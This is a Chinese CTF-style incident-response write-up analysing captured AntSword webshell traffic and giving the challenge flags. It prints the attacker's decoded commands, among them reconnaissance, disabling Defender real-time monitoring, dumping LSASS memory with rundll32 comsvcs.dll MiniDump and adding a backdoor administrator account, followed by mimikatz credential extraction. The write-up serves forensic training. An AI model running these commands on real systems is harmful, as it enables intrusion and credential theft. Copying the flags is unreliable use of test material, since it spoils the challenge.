【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

admin 2024年7月4日07:36:53评论10 views字数 3060阅读10分12秒阅读模式
【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

点击上方蓝字·关注我们

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

01

应急响应小组成员老狼在 waf 上下载了一段流量,请你分析黑客攻击手法,并且解答下面问题

1.管理员Admin账号的密码是什么?


导出
HTTP数据流发现product2.php是黑客上传的文件,因为他下面是Base64加密

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

继续分析Base64特征,可以判断为蚁剑流量特征

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

这里ctrl+Fproduct2.php查看第一个包,依次对数据包进行全部解密.

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

C:/phpStudy/PHPTutorial/WWW/onlineshop/database/onlineshop.sqlcd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&ls&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&whoami&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&whoami /priv&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&systeminfo&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir c:&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir c:temp&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net user&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net localgroup administrators&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net group “domain group” /domain&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net group “domain admins” /domain&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net view&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net share&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:TempOnlineShopBackup.zip full&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir c:temp&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&ls&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&copy store.php c:temp&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir c:temp&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:tempOnlineShopBackup.zip full&echo [S]&cd&echo [E]C:/Temp/OnlineShopBack.zipcd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&dir c:windowssystem32&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&dir c:windowsconfig&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net user&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net user admin Password1 /add&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&net localgroup administrators admin /add&echo [S]&cd&echo [E]cd /d “C:phpStudyPHPTutorialWWWonlineshop”&whoami /all&echo [S]&cd&echo [E]#第二题编码列出来好找:##ilY2QgL2QgIkM6XFxwaHBTdHVkeVxcUEhQVHV0b3JpYWxcXFdXV1xcb25saW5lc2hvcCImbmV0IHVzZXIgYWRtaW4gUGFzc3dvcmQxIC9hZGQmZWNobyBbU10mY2QmZWNobyBbRV0="

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

FLAG:Password1

02

2.LSASS.exe的程序进程ID是多少?

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

FLAG:852

03

3.用户WIN101的密码是什么?

导出http流找到47MB的导出分组字节流product2.php因为是蚁剑流量所以会有多余字节,删除即可.多余字节 e1c1709 加载mimiktz 

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

sekurlsa::minidump 1.dmpsekurlsa::logonpasswords

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

FLAG:admin#123

总结:

这个也是蚁剑的流量,老样子Base64解密,rundll32.exe可用于执行DLL文件,也能调用该文件中的内部函数,这里就调用comsvcs.dll中的MiniDump函数会生成一个lsass.dmp文件 存储了系统账号密码mimiktz 执行读取命令即可.

PS:这里版本不一样解密不出来

【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树
欢迎关注鱼影安全安全社区,专注CTF,职业技能大赛中高职技能培训,金砖企业赛,世界技能大赛省选拔赛,企业赛,行业赛,电子取证和CTF系列培训。
鱼影安全团队招人啦~  有感兴趣的师傅可以私信我,一起赚钱啦!
【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

关注我们

原文始发于微信公众号(鱼影安全):【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月4日07:36:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【玄机-应急平台】第六章 流量特征分析-蚂蚁爱上树http://cn-sec.com/archives/2838412.html

发表评论

匿名网友 填写信息